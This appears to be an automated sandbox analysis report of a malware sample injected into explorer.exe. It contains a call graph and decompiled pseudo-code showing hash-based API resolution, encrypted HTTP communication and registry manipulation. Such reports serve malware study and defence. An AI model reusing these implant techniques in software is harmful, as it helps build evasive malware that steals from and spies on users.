77400f 3656->3658 3657 7740dd 3657->3641 3658->3657 3659 774072 MultiByteToWideChar MultiByteToWideChar 3658->3659 3660 7740c9 3659->3660 3688 773988 FindFirstFileA FindClose 3660->3688 3689 7748dc 3662->3689 3664 77498a SHGetValueA 3665 7749bb RegOpenKeyExA 3664->3665 3666 774a12 3664->3666 3665->3666 3667 7749da 3665->3667 3666->3634 3691 773930 RegSetValueExA 3667->3691 3669 7749fb 3692 773890 RegCloseKey 3669->3692 3672 7748d4 3671->3672 3673 774895 WriteFile 3671->3673 3676 77763c CreateFileA 3672->3676 3674 7748b1 3673->3674 3675 7748c0 FlushFileBuffers CloseHandle 3673->3675 3674->3675 3675->3672 3677 777667 GetFileSize 3676->3677 3678 777692 3676->3678 3679 777686 CloseHandle 3677->3679 3680 77767c 3677->3680 3681 777240 36 API calls 3678->3681 3683 77769c 3679->3683 3693 777240 3680->3693 3681->3683 3683->3654 3948 7713dc GetProcessHeap RtlAllocateHeap 3684->3948 3686 773b99 3686->3646 3687->3648 3688->3657 3690 7748f9 3689->3690 3690->3664 3691->3669 3692->3666 3694 777259 3693->3694 3699 7771d4 3694->3699 3697 777271 3697->3679 3700 7771f1 3699->3700 3704 777231 3699->3704 3706 7764bc 3700->3706 3702 7771fc 3719 775d20 3702->3719 3704->3697 3705 771440 GetProcessHeap HeapFree 3704->3705 3705->3697 3707 7764d8 3706->3707 3708 77651f GetVersionExA 3707->3708 3821 771864 wsprintfA 3708->3821 3710 776549 3822 771864 wsprintfA 3710->3822 3712 776572 3823 771864 wsprintfA 3712->3823 3714 776593 3824 773ea0 3714->3824 3718 7765f2 3718->3702 3720 776332 3719->3720 3721 775d38 3719->3721 3720->3704 3721->3720 3836 7754b8 3721->3836 3726 775858 3 API calls 3727 775dfe 3726->3727 3849 7717e8 3727->3849 3737 775eaf 3864 773864 InternetOpenA 3737->3864 3739 775ed6 3865 77170c InternetSetOptionA 3739->3865 3741 775ef2 3866 77170c InternetSetOptionA 3741->3866 3743 775f0b 3867 77170c InternetSetOptionA 3743->3867 3745 775f24 3868 77170c InternetSetOptionA 3745->3868 3747 775f36 3869 77170c InternetSetOptionA 3747->3869 3749 775f4f 3750 775f76 3749->3750 3870 77170c 
InternetSetOptionA 3749->3870 3871 77161c InternetConnectA 3750->3871 3753 775fa8 3872 771660 HttpOpenRequestA 3753->3872 3755 776013 3756 776050 3755->3756 3873 7716d8 InternetQueryOptionA 3755->3873 3757 7760b0 3756->3757 3758 776056 3756->3758 3894 7713dc GetProcessHeap RtlAllocateHeap 3757->3894 3875 775894 3758->3875 3761 776037 3874 77170c InternetSetOptionA 3761->3874 3765 7760ae 3895 7715e4 HttpSendRequestA 3765->3895 3768 77607a 3770 775894 6 API calls 3768->3770 3769 7760f6 3771 7760fa 3769->3771 3772 776107 3769->3772 3770->3765 3896 771440 GetProcessHeap HeapFree 3771->3896 3897 771440 GetProcessHeap HeapFree 3772->3897 3775 77610f 3898 7739cc HttpQueryInfoA 3775->3898 3778 776322 3935 77151c InternetCloseHandle 3778->3935 3779 776138 3792 776102 3779->3792 3899 7713dc GetProcessHeap RtlAllocateHeap 3779->3899 3782 77632a 3936 77151c InternetCloseHandle 3782->3936 3783 77614f 3786 7761c5 3783->3786 3783->3792 3900 7716a4 InternetQueryDataAvailable 3783->3900 3901 771460 GetProcessHeap RtlReAllocateHeap 3783->3901 3902 7715b0 InternetReadFile 3783->3902 3787 7761cb 3786->3787 3788 7761d8 3786->3788 3903 771440 GetProcessHeap HeapFree 3787->3903 3904 7713dc GetProcessHeap RtlAllocateHeap 3788->3904 3934 77151c InternetCloseHandle 3792->3934 3793 7761e1 3905 7759bc 3793->3905 3797 7717e8 CryptAcquireContextA 3798 776222 3797->3798 3919 771374 3798->3919 3803 771404 CryptHashData 3804 776261 3803->3804 3805 771404 CryptHashData 3804->3805 3806 77627e 3805->3806 3807 771404 CryptHashData 3806->3807 3808 776292 3807->3808 3925 771490 3808->3925 3813 771b20 CryptReleaseContext 3814 7762c4 3813->3814 3815 7762db 3814->3815 3816 7762fd 3814->3816 3931 771440 GetProcessHeap HeapFree 3815->3931 3933 771440 GetProcessHeap HeapFree 3816->3933 3819 7762e3 3932 771440 GetProcessHeap HeapFree 3819->3932 3821->3710 3822->3712 3823->3714 3825 773eaf RegCreateKeyExA 3824->3825 3826 773ed5 RegCreateKeyExA 3824->3826 3827 773ef9 3825->3827 3826->3827 3834 7738b0 
RegQueryValueExA 3827->3834 3829 773f16 3835 773890 RegCloseKey 3829->3835 3831 773f2f 3832 775468 GetSystemTime 3831->3832 3833 775480 3832->3833 3833->3718 3834->3829 3835->3831 3838 7754cb 3836->3838 3837 77560f 3842 775858 3837->3842 3840 775567 3838->3840 3937 771844 wsprintfA 3838->3937 3840->3837 3938 771844 wsprintfA 3840->3938 3843 7717e8 CryptAcquireContextA 3842->3843 3844 775877 3843->3844 3939 77153c 3844->3939 3847 771b20 CryptReleaseContext 3848 77588f 3847->3848 3848->3726 3850 77181e 3849->3850 3851 771801 CryptAcquireContextA 3849->3851 3852 7718a0 3850->3852 3851->3850 3853 7718da 3852->3853 3854 7718b9 CryptImportKey 3852->3854 3855 771ab0 3853->3855 3854->3853 3856 771aee 3855->3856 3857 771ac9 CryptEncrypt 3855->3857 3858 771af8 3856->3858 3857->3856 3859 771b18 3858->3859 3860 771b0b CryptDestroyKey 3858->3860 3861 771b20 3859->3861 3860->3859 3862 771b47 3861->3862 3863 771b36 CryptReleaseContext 3861->3863 3862->3737 3863->3862 3864->3739 3865->3741 3866->3743 3867->3745 3868->3747 3869->3749 3870->3750 3871->3753 3872->3755 3873->3761 3874->3756 3876 7717e8 CryptAcquireContextA 3875->3876 3877 7758bb 3876->3877 3878 7718a0 CryptImportKey 3877->3878 3879 775904 3878->3879 3942 771574 3879->3942 3882 771574 CryptSetKeyParam 3883 775936 3882->3883 3884 775945 3883->3884 3885 775960 3883->3885 3886 771ab0 CryptEncrypt 3884->3886 3888 771ab0 CryptEncrypt 3885->3888 3887 77595e 3886->3887 3889 771af8 CryptDestroyKey 3887->3889 3888->3887 3890 7759a9 3889->3890 3891 771b20 CryptReleaseContext 3890->3891 3892 7759b3 3891->3892 3893 7713dc GetProcessHeap RtlAllocateHeap 3892->3893 3893->3768 3894->3765 3895->3769 3896->3792 3897->3775 3898->3779 3899->3783 3900->3783 3901->3783 3902->3783 3903->3792 3904->3793 3906 7759e3 3905->3906 3907 7759d6 3905->3907 3906->3907 3908 7717e8 CryptAcquireContextA 3906->3908 3907->3797 3909 775a0f 3908->3909 3910 7718a0 CryptImportKey 3909->3910 3911 775a58 3910->3911 3912 771574 CryptSetKeyParam 3911->3912 3913 
775a71 3912->3913 3945 7717a4 3913->3945 3915 775a9c 3916 771af8 CryptDestroyKey 3915->3916 3917 775ad2 3916->3917 3918 771b20 CryptReleaseContext 3917->3918 3918->3907 3920 7713aa 3919->3920 3921 77138d CryptCreateHash 3919->3921 3922 771404 3920->3922 3921->3920 3923 771436 3922->3923 3924 77141d CryptHashData 3922->3924 3923->3803 3924->3923 3926 7714a9 CryptGetHashParam 3925->3926 3927 7714c6 3925->3927 3926->3927 3928 7714d0 3927->3928 3929 7714f0 3928->3929 3930 7714e3 CryptDestroyHash 3928->3930 3929->3813 3930->3929 3931->3819 3932->3792 3933->3792 3934->3778 3935->3782 3936->3720 3937->3838 3938->3840 3940 771555 CryptGenRandom 3939->3940 3941 77156a 3939->3941 3940->3941 3941->3847 3943 77158d CryptSetKeyParam 3942->3943 3944 7715a6 3942->3944 3943->3944 3944->3882 3946 7717de 3945->3946 3947 7717bd CryptDecrypt 3945->3947 3946->3915 3947->3946 3948->3686

    Executed Functions

    C-Code - Quality: 58%
    			E00778A48(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				intOrPtr _v8;
    				void* _t12;
    				intOrPtr _t23;
    				void* _t24;
    
    				_t12 = _a8 - 2;
    				if(_t12 == 0) {
    					PostQuitMessage(0);
    					_v8 = 0;
    				} else {
    					if(_t12 == 0xf) {
    						E007778FC(_a16 & 0x80000000, _t24);
    						_v8 = 1;
    					} else {
    						_t23 =  *0x77b300(_a4, _a8, _a12, _a16); // executed
    						_v8 = _t23;
    					}
    				}
    				return _v8;
    			}

    Instruction addresses: 0x00778a51, 0x00778a54, 0x00778a5f, 0x00778a67, 0x00778a56, 0x00778a59, 0x00778a74, 0x00778a79, 0x00778a5b, 0x00778a92, 0x00778a98, 0x00778a98, 0x00778a59, 0x00778aa1

    APIs
    • PostQuitMessage.USER32(00000000), ref: 00778A5F
      • Part of subcall function 007778FC: SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 0077795A
      • Part of subcall function 007778FC: SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 0077796D
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00778A92
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 58%
    			E00778A44(intOrPtr* __eax, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				intOrPtr _v8;
    				intOrPtr _v117;
    				void* _t15;
    				intOrPtr _t26;
    				void* _t27;
    
    				 *__eax =  *__eax + __eax;
    				_v117 = _v117 + __edx;
    				_t15 = _a12 - 2;
    				if(_t15 == 0) {
    					PostQuitMessage(0);
    					_v8 = 0;
    				} else {
    					if(_t15 == 0xf) {
    						E007778FC(_a16 & 0x80000000, _t27);
    						_v8 = 1;
    					} else {
    						_t26 =  *0x77b300(_a4, _a8, _a12, _a16); // executed
    						_v8 = _t26;
    					}
    				}
    				return _v8;
    			}
    Instruction addresses: 0x00778a45, 0x00778a47, 0x00778a51, 0x00778a54, 0x00778a5f, 0x00778a67, 0x00778a56, 0x00778a59, 0x00778a74, 0x00778a79, 0x00778a5b, 0x00778a92, 0x00778a98, 0x00778a98, 0x00778a59, 0x00778aa1

    APIs
      • Part of subcall function 007778FC: SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 0077795A
      • Part of subcall function 007778FC: SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 0077796D
    • PostQuitMessage.USER32(00000000), ref: 00778A5F
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00778A92
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00772574(intOrPtr __eax) {
    				intOrPtr _v8;
    				struct HINSTANCE__* _v12;
    				CHAR* _t492;
    				CHAR* _t500;
    				struct HINSTANCE__* _t564;
    				CHAR* _t567;
    				struct HINSTANCE__* _t568;
    				CHAR* _t571;
    				CHAR* _t587;
    				CHAR* _t669;
    				CHAR* _t677;
    				CHAR* _t685;
    				struct HINSTANCE__* _t686;
    				CHAR* _t693;
    				CHAR* _t699;
    				struct HINSTANCE__* _t700;
    				CHAR* _t707;
    				intOrPtr _t712;
    				CHAR* _t713;
    				struct HINSTANCE__* _t714;
    				CHAR* _t755;
    				struct HINSTANCE__* _t756;
    
    				_v8 = __eax;
    				_v12 = E007724F8();
    				 *0x77b11c = E00771994(_v12, 0xc8ac8026);
    				 *0x77b120 = E00771994(_v12, 0x4b935b8e);
    				 *0x77b1d0 = E00771994(_v12, 0x78b00c7e);
    				 *0x77b144 = E00771994(_v12, 0x25447ac6);
    				 *0x77b148 = E00771994(_v12, 0xf50b872);
    				 *0x77b160 = E00771994(_v12, 0x9e6fa842);
    				 *0x77b1bc = E00771994(_v12, 0x7d544dbd);
    				 *0x77b124 = E00771994(_v12, 0x1fc0eaee);
    				 *0x77b384 = E00771994(_v12, 0x270118e2);
    				 *0x77b498 = E00771994(_v12, 0x4ae7572b);
    				 *0x77b138 = E00771994(_v12, 0x81f0f0c9);
    				 *0x77b140 = E00771994(_v12, 0x95fb6a02);
    				 *0x77b334 = E00771994(_v12, 0x70f6fe31);
    				 *0x77b338 = E00771994(_v12, 0x399354ce);
    				 *0x77b128 = E00771994(_v12, 0xa45b370a);
    				 *0x77b208 = E00771994(_v12, 0x2b00b870);
    				 *0x77b1c4 = E00771994(_v12, 0x4fba916c);
    				 *0x77b2a4 = E00771994(_v12, 0xc54374f3);
    				 *0x77b2a0 = E00771994(_v12, 0x9c700049);
    				 *0x77b29c = E00771994(_v12, 0x4f6ca717);
    				 *0x77b2d8 = E00771994(_v12, 0x67ecde97);
    				 *0x77b2dc = E00771994(_v12, 0xfdc94385);
    				 *0x77b2e0 = E00771994(_v12, 0x68807354);
    				 *0x77b2e4 = E00771994(_v12, 0x84d25ea);
    				 *0x77b2e8 = E00771994(_v12, 0xfc7a6efd);
    				 *0x77b2ec = E00771994(_v12, 0x5550b067);
    				 *0x77b2f0 = E00771994(_v12, 0xaebea6a);
    				 *0x77b12c = E00771994(_v12, 0x46318ac7);
    				 *0x77b130 = E00771994(_v12, 0x49a1374a);
    				 *0x77b134 = E00771994(_v12, 0xae17c571);
    				 *0x77b150 = E00771994(_v12, 0xe61874b3);
    				 *0x77b154 = E00771994(_v12, 0x3a7a7478);
    				 *0x77b158 = E00771994(_v12, 0x533d3b41);
    				 *0x77b15c = E00771994(_v12, 0x99a4299d);
    				 *0x77b164 = E00771994(_v12, 0xbea0bf35);
    				 *0x77b168 = E00771994(_v12, 0x9d00a761);
    				 *0x77b188 = E00771994(_v12, 0x9abfb8a6);
    				 *0x77b194 = E00771994(_v12, 0x6b416786);
    				 *0x77b198 = E00771994(_v12, 0x774393e8);
    				 *0x77b19c = E00771994(_v12, 0x2ee4f10d);
    				 *0x77b1a0 = E00771994(_v12, 0x19f78c90);
    				 *0x77b1a4 = E00771994(_v12, 0xd89ad05);
    				 *0x77b1a8 = E00771994(_v12, 0xc930ea1e);
    				 *0x77b18c = E00771994(_v12, 0x5bc1d14f);
    				 *0x77b1e0 = E00771994(_v12, 0x77cd9567);
    				 *0x77b1f0 = E00771994(_v12, 0x32432444);
    				 *0x77b1f4 = E00771994(_v12, 0x279dead7);
    				 *0x77b1f8 = E00771994(_v12, 0x7b4842c1);
    				 *0x77b1fc = E00771994(_v12, 0xae52c609);
    				 *0x77b200 = E00771994(_v12, 0xbf78969c);
    				 *0x77b204 = E00771994(_v12, 0xbb74a4a2);
    				 *0x77b22c = E00771994(_v12, 0x464871f3);
    				 *0x77b190 = E00771994(_v12, 0x9bd6888f);
    				 *0x77b20c = E00771994(_v12, 0x5c17ec75);
    				 *0x77b210 = E00771994(_v12, 0x58fe7abe);
    				 *0x77b254 = E00771994(_v12, 0x768aa260);
    				 *0x77b25c = E00771994(_v12, 0xef0a25b7);
    				 *0x77b260 = E00771994(_v12, 0xbc262395);
    				 *0x77b264 = E00771994(_v12, 0xe8bf6dad);
    				 *0x77b268 = E00771994(_v12, 0x5cd9430);
    				 *0x77b26c = E00771994(_v12, 0xaef7cbf1);
    				 *0x77b274 = E00771994(_v12, 0x475587b7);
    				 *0x77b278 = E00771994(_v12, 0x3def91ba);
    				 *0x77b408 = E00771994(_v12, 0xda81bc58);
    				 *0x77b40c = E00771994(_v12, 0xf3b84f05);
    				 *0x77b410 = E00771994(_v12, 0x392b6027);
    				 *0x77b414 = E00771994(_v12, 0x7b2d2505);
    				 *0x77b314 = E00771994(_v12, 0xeeba5eba);
    				 *0x77b2a8 = E00771994(_v12, 0x89b968d2);
    				 *0x77b2c0 = E00771994(_v12, 0x7e92ca65);
    				 *0x77b2f4 = E00771994(_v12, 0x4c1077d6);
    				 *0x77b31c = E00771994(_v12, 0x84033deb);
    				 *0x77b320 = E00771994(_v12, 0x725cb0a1);
    				 *0x77b250 = E00771994(_v12, 0x52ac19c);
    				 *0x77b318 = E00771994(_v12, 0x23ebe98b);
    				 *0x77b464 = E00771994(_v12, 0x3b3ee0f9);
    				 *0x77b468 = E00771994(_v12, 0x8d5a50dc);
    				 *0x77b46c = E00771994(_v12, 0x8d5a50ca);
    				 *0x77b470 = E00771994(_v12, 0x5e7ee0d0);
    				 *0x77b474 = E00771994(_v12, 0x69260152);
    				 *0x77b478 = E00771994(_v12, 0x9c480e24);
    				 *0x77b47c = E00771994(_v12, 0x5aa7e70b);
    				 *0x77b488 = E00771994(_v12, 0xe74f57ee);
    				 *0x77b48c = E00771994(_v12, 0x2d40b8f0);
    				 *0x77b490 = E00771994(_v12, 0xae17c071);
    				 *0x77b494 = E00771994(_v12, 0x515be757);
    				 *0x77b49c = E00771994(_v12, 0x1297812c);
    				 *0x77b4a0 = E00771994(_v12, 0x2f2feeda);
    				 *0x77b4a4 = E00771994(_v12, 0x81f0f0df);
    				 *0x77b4a8 = E00771994(_v12, 0xf3fd1c3);
    				 *0x77b4ac = E00771994(_v12, 0xef48e03a);
    				 *0x77b4b0 = E00771994(_v12, 0xfb0730c);
    				 *0x77b4b4 = E00771994(_v12, 0xa9de6f5a);
    				 *0x77b4b8 = E00771994(_v12, 0x723eb0d5);
    				 *0x77b4bc = E00771994(_v12, 0x487fe16b);
    				 *0x77b4c0 = E00771994(_v12, 0x8f8f114);
    				 *0x77b4c4 = E00771994(_v12, 0x3d9972f5);
    				 *0x77b4c8 = E00771994(_v12, 0x6fb89af0);
    				 *0x77b4cc = E00771994(_v12, 0xc09d5d66);
    				 *0x77b4d0 = E00771994(_v12, 0x2ca2b7e6);
    				 *0x77b4d4 = E00771994(_v12, 0x7b88bf3b);
    				 *0x77b4d8 = E00771994(_v12, 0xaa1de02f);
    				 *0x77b4dc = E00771994(_v12, 0xa48d6762);
    				 *0x77b4e0 = E00771994(_v12, 0x3a35705f);
    				 *0x77b4e8 = E00771994(_v12, 0x697a6afe);
    				 *0x77b4ec = E00771994(_v12, 0x95902b19);
    				 *0x77b4f0 = E00771994(_v12, 0x1295012c);
    				 *0x77b4f4 = E00771994(_v12, 0x2891ae7a);
    				 *0x77b4f8 = E00771994(_v12, 0x831a3927);
    				 *0x77b23c = E00771994(_v12, 0xd0498cd4);
    				 *0x77c22c = E00771994(_v12, 0xd0498cc2);
    				_t492 =  *0x77a084; // 0x771bf0
    				_v12 = LoadLibraryA(_t492);
    				 *0x77b230 = E00771994(_v12, 0xa638ce5f);
    				 *0x77b234 = E00771994(_v12, 0xbc44a131);
    				 *0x77b238 = E00771994(_v12, 0xf6edf382);
    				_t500 =  *0x77a080; // 0x771be8
    				_v12 = LoadLibraryA(_t500);
    				 *0x77b2fc = E00771994(_v12, 0x1ab922bf);
    				 *0x77b2f8 = E00771994(_v12, 0xa8afd1f3);
    				 *0x77b300 = E00771994(_v12, 0xc6ce9b8a);
    				 *0x77b304 = E00771994(_v12, 0xf26817eb);
    				 *0x77b308 = E00771994(_v12, 0x7506e960);
    				 *0x77b30c = E00771994(_v12, 0xbf7efb5a);
    				 *0x77b310 = E00771994(_v12, 0x4baed1c8);
    				 *0x77b484 = E00771994(_v12, 0x7396104b);
    				 *0x77b480 = E00771994(_v12, 0xb800c8a6);
    				 *0x77b388 = E00771994(_v12, 0x8616ab9b);
    				 *0x77b38c = E00771994(_v12, 0xb4584dda);
    				 *0x77b1b4 = E00771994(_v12, 0x6c7f716f);
    				 *0x77b1b0 = E00771994(_v12, 0x252b53b);
    				 *0x77b2ac = E00771994(_v12, 0xd36ceaf0);
    				 *0x77b2b0 = E00771994(_v12, 0xd7a87c3a);
    				 *0x77b2b4 = E00771994(_v12, 0xc45d9631);
    				 *0x77b2b8 = E00771994(_v12, 0x4baed1de);
    				 *0x77b2bc = E00771994(_v12, 0x8ebef5b1);
    				 *0x77b270 = E00771994(_v12, 0xea3af0d7);
    				 *0x77b418 = E00771994(_v12, 0x484007c);
    				 *0x77b41c = E00771994(_v12, 0x58a81c29);
    				 *0x77b420 = E00771994(_v12, 0xcacd450);
    				 *0x77b424 = E00771994(_v12, 0xabbc680d);
    				 *0x77b42c = E00771994(_v12, 0x7cbd2247);
    				 *0x77b428 = E00771994(_v12, 0xbdb70517);
    				 *0x77b430 = E00771994(_v12, 0x1d6c998b);
    				 *0x77b434 = E00771994(_v12, 0xa2f65ba2);
    				 *0x77b438 = E00771994(_v12, 0xad4ffcd5);
    				 *0x77b43c = E00771994(_v12, 0xc8a274ac);
    				 *0x77b440 = E00771994(_v12, 0x5fda1871);
    				 *0x77b444 = E00771994(_v12, 0xc0d4187d);
    				_t564 = LoadLibraryA("Psapi"); // executed
    				_v12 = _t564;
    				 *0x77b4e4 = E00771994(_v12, 0x860331a8);
    				_t567 =  *0x77a0a4; // 0x771c40
    				_t568 = LoadLibraryA(_t567); // executed
    				_v12 = _t568;
    				 *0x77b178 = E00771994(_v12, 0xa60c5f05);
    				_t571 =  *0x77a0d0; // 0x771cac
    				_v12 = LoadLibraryA(_t571);
    				 *0x77b3ec = E00771994(_v12, 0x5af0017c);
    				 *0x77b3f0 = E00771994(_v12, 0x5e10f525);
    				 *0x77b3f4 = E00771994(_v12, 0x48b87efc);
    				 *0x77b3f8 = E00771994(_v12, 0xdf91a857);
    				 *0x77b3fc = E00771994(_v12, 0x9e90b462);
    				 *0x77b400 = E00771994(_v12, 0x4894dafc);
    				 *0x77b404 = E00771994(_v12, 0x59012669);
    				_t587 =  *0x77a0e0; // 0x771d08
    				_v12 = LoadLibraryA(_t587);
    				 *0x77b330 = E00771994(_v12, 0xb9d41c2f);
    				 *0x77b1b8 = E00771994(_v12, 0xb96ca1c0);
    				 *0x77b1c0 = E00771994(_v12, 0x28e9e291);
    				 *0x77b1c8 = E00771994(_v12, 0x1d1f334a);
    				 *0x77b1cc = E00771994(_v12, 0x5cb5ef72);
    				 *0x77b2c8 = E00771994(_v12, 0xce303c3a);
    				 *0x77b2c4 = E00771994(_v12, 0x3e68cfc6);
    				 *0x77b2cc = E00771994(_v12, 0xd4ecc759);
    				 *0x77b2d0 = E00771994(_v12, 0xd21e3d01);
    				 *0x77b2d4 = E00771994(_v12, 0xad0c9f7e);
    				 *0x77b4fc = E00771994(_v12, 0x8ad7de34);
    				 *0x77b500 = E00771994(_v12, 0x78660dbe);
    				 *0x77b504 = E00771994(_v12, 0xcebf13be);
    				 *0x77b508 = E00771994(_v12, 0xd4b3d42);
    				 *0x77b50c = E00771994(_v12, 0x72760bb8);
    				 *0x77b448 = E00771994(_v12, 0x3c4de260);
    				 *0x77b44c = E00771994(_v12, 0xf837a387);
    				 *0x77b450 = E00771994(_v12, 0xc3f46335);
    				 *0x77b454 = E00771994(_v12, 0xa5ffa46e);
    				 *0x77b458 = E00771994(_v12, 0x453db143);
    				 *0x77b45c = E00771994(_v12, 0x37a53419);
    				 *0x77b460 = E00771994(_v12, 0xcebf17e6);
    				 *0x77b17c = E00771994(_v12, 0xaad67ff8);
    				 *0x77b180 = E00771994(_v12, 0x3ef2d3dd);
    				 *0x77b184 = E00771994(_v12, 0x90a097e6);
    				 *0x77b16c = E00771994(_v12, 0x7a2167dc);
    				 *0x77b170 = E00771994(_v12, 0x1b3d12b9);
    				 *0x77b174 = E00771994(_v12, 0x80dbbe07);
    				 *0x77b1ac = E00771994(_v12, 0x398c5285);
    				 *0x77b1dc = E00771994(_v12, 0x560c7c4a);
    				 *0x77b1d8 = E00771994(_v12, 0xdb355534);
    				 *0x77b1d4 = E00771994(_v12, 0x3e400fd6);
    				 *0x77b1e4 = E00771994(_v12, 0xee6ab5d);
    				 *0x77b1e8 = E00771994(_v12, 0x1802e7c8);
    				 *0x77b1ec = E00771994(_v12, 0xf65a7d95);
    				 *0x77b224 = E00771994(_v12, 0xb8538a52);
    				 *0x77b228 = E00771994(_v12, 0xccd03c3a);
    				 *0x77b328 = E00771994(_v12, 0x6d523bdd);
    				 *0x77b32c = E00771994(_v12, 0xf2f9de08);
    				 *0x77b324 = E00771994(_v12, 0xce30283a);
    				_t669 =  *0x77a094; // 0x771c20
    				_v12 = LoadLibraryA(_t669);
    				 *0x77b214 = E00771994(_v12, 0x3caa9945);
    				 *0x77b218 = E00771994(_v12, 0x5a56b493);
    				 *0x77b258 = E00771994(_v12, 0x7dfb3ef0);
    				_t677 =  *0x77a088; // 0x771bf8
    				_v12 = LoadLibraryA(_t677);
    				 *0x77b14c = E00771994(_v12, 0xf2276995);
    				 *0x77b21c = E00771994(_v12, 0xc95d8550);
    				 *0x77b220 = E00771994(_v12, 0x570bc899);
    				_t685 =  *0x77a098; // 0x771c28
    				_t686 = LoadLibraryA(_t685); // executed
    				_v12 = _t686;
    				 *0x77b27c = E00771994(_v12, 0x368435be);
    				 *0x77b280 = E00771994(_v12, 0xf341d5cf);
    				 *0x77b284 = E00771994(_v12, 0xedb3159d);
    				_t693 =  *0x77a1b8; // 0x771eec
    				_v12 = LoadLibraryA(_t693);
    				 *0x77b288 = E00771994(_v12, 0x3184919f);
    				 *0x77b28c = E00771994(_v12, 0x39aedd1b);
    				_t699 =  *0x77a0a0; // 0x771c38
    				_t700 = LoadLibraryA(_t699); // executed
    				_v12 = _t700;
    				 *0x77b290 = E00771994(_v12, 0x8a94f707);
    				 *0x77b294 = E00771994(_v12, 0x7aa45c7a);
    				 *0x77b298 = E00771994(_v12, 0x4e26c00f);
    				_t707 =  *0x77a0cc; // 0x771ca4
    				_v12 = LoadLibraryA(_t707);
    				 *0x77b33c = E00771994(_v12, 0x233e6d0f);
    				_t712 = E00771994(_v12, 0xbf821ad);
    				 *0x77b340 = _t712;
    				if(_v8 != 0) {
    					_t713 =  *0x77a1b0; // 0x771edc
    					_t714 = LoadLibraryA(_t713); // executed
    					_v12 = _t714;
    					 *0x77b34c = E00771994(_v12, 0xd939f838);
    					 *0x77b344 = E00771994(_v12, 0x9400a044);
    					 *0x77b348 = E00771994(_v12, 0xee9bf475);
    					 *0x77b3a4 = E00771994(_v12, 0xe797764);
    					 *0x77b3a8 = E00771994(_v12, 0xedd8fe8a);
    					 *0x77b3ac = E00771994(_v12, 0xe5971f6);
    					 *0x77b3b0 = E00771994(_v12, 0x5d99726a);
    					 *0x77b3b4 = E00771994(_v12, 0x1f935b1d);
    					 *0x77b3b8 = E00771994(_v12, 0xfc7af16a);
    					 *0x77b3bc = E00771994(_v12, 0x939d7d9c);
    					 *0x77b3c0 = E00771994(_v12, 0xcdde757d);
    					 *0x77b3c4 = E00771994(_v12, 0xc5a7764);
    					 *0x77b3c8 = E00771994(_v12, 0x9e7d3188);
    					 *0x77b3cc = E00771994(_v12, 0x3c797b7a);
    					 *0x77b3d0 = E00771994(_v12, 0x4dfc1f3b);
    					 *0x77b3d4 = E00771994(_v12, 0x8e9bf775);
    					 *0x77b3d8 = E00771994(_v12, 0x8fb8b5bd);
    					 *0x77b3dc = E00771994(_v12, 0xb909d088);
    					 *0x77b3e0 = E00771994(_v12, 0xf44318c6);
    					 *0x77b3e4 = E00771994(_v12, 0x95e4a5d7);
    					_t755 =  *0x77a1b4; // 0x771ee4
    					_t756 = LoadLibraryA(_t755); // executed
    					_v12 = _t756;
    					 *0x77b13c = E00771994(_v12, 0xaa91290b);
    					 *0x77b350 = E00771994(_v12, 0x8593dd7);
    					 *0x77b354 = E00771994(_v12, 0x6ae49924);
    					 *0x77b358 = E00771994(_v12, 0x7314fb0c);
    					 *0x77b35c = E00771994(_v12, 0xb87dbd66);
    					 *0x77b360 = E00771994(_v12, 0x2f5ce027);
    					 *0x77b364 = E00771994(_v12, 0xa3a80ab6);
    					 *0x77b368 = E00771994(_v12, 0xddcb15d);
    					 *0x77b36c = E00771994(_v12, 0x8733d614);
    					 *0x77b370 = E00771994(_v12, 0xfde87743);
    					 *0x77b390 = E00771994(_v12, 0x1a212962);
    					 *0x77b394 = E00771994(_v12, 0x9f13856a);
    					 *0x77b398 = E00771994(_v12, 0xbe618d3e);
    					 *0x77b39c = E00771994(_v12, 0x1510002f);
    					 *0x77b3a0 = E00771994(_v12, 0x7edec584);
    					 *0x77b380 = E00771994(_v12, 0xaa912901);
    					 *0x77b374 = E00771994(_v12, 0x2ae71934);
    					 *0x77b378 = E00771994(_v12, 0x1ad09c78);
    					 *0x77b37c = E00771994(_v12, 0x9ef6461);
    					_t712 = E00771994(_v12, 0x57fbc0dd);
    					 *0x77b3e8 = _t712;
    				}
    				return _t712;
    			}
    Instruction addresses: 0x0077257a, 0x00772582, 0x00772592, 0x007725a4, 0x007725b6, 0x007725c8, 0x007725da, 0x007725ec, 0x007725fe, 0x00772610, 0x00772622, 0x00772634, 0x00772646, 0x00772658, 0x0077266a, 0x0077267c, 0x0077268e, 0x007726a0, 0x007726b2, 0x007726c4, 0x007726d6, 0x007726e8, 0x007726fa, 0x0077270c, 0x0077271e, 0x00772730, 0x00772742, 0x00772754, 0x00772766, 0x00772778, 0x0077278a, 0x0077279c, 0x007727ae, 0x007727c0, 0x007727d2, 0x007727e4, 0x007727f6, 0x00772808, 0x0077281a, 0x0077282c, 0x0077283e, 0x00772850, 0x00772862, 0x00772874, 0x00772886, 0x00772898, 0x007728aa, 0x007728bc, 0x007728ce, 0x007728e0, 0x007728f2, 0x00772904, 0x00772916, 0x00772928, 0x0077293a, 0x0077294c, 0x0077295e, 0x00772970, 0x00772982, 0x00772994, 0x007729a6, 0x007729b8, 0x007729ca, 0x007729dc, 0x007729ee, 0x00772a00, 0x00772a12, 0x00772a24, 0x00772a36, 0x00772a48, 0x00772a5a, 0x00772a6c, 0x00772a7e, 0x00772a90, 0x00772aa2, 0x00772ab4, 0x00772ac6, 0x00772ad8, 0x00772aea, 0x00772afc, 0x00772b0e, 0x00772b20, 0x00772b32, 0x00772b44, 0x00772b56, 0x00772b68, 0x00772b7a, 0x00772b8c, 0x00772b9e, 0x00772bb0, 